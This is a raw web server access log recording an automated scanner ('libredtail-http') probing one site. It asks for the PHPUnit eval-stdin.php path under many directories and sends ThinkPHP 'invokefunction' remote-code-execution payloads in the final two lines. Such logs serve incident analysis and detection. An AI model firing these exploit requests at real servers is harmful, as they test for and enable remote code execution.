34.171.29.151 - - [19/Oct/2025:23:38:00 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:00 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:00 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:00 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:01 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:01 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:01 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:01 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:02 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:02 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:02 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:02 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:03 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:03 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:03 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:03 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:04 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:05 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
34.171.29.151 - - [19/Oct/2025:23:38:06 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
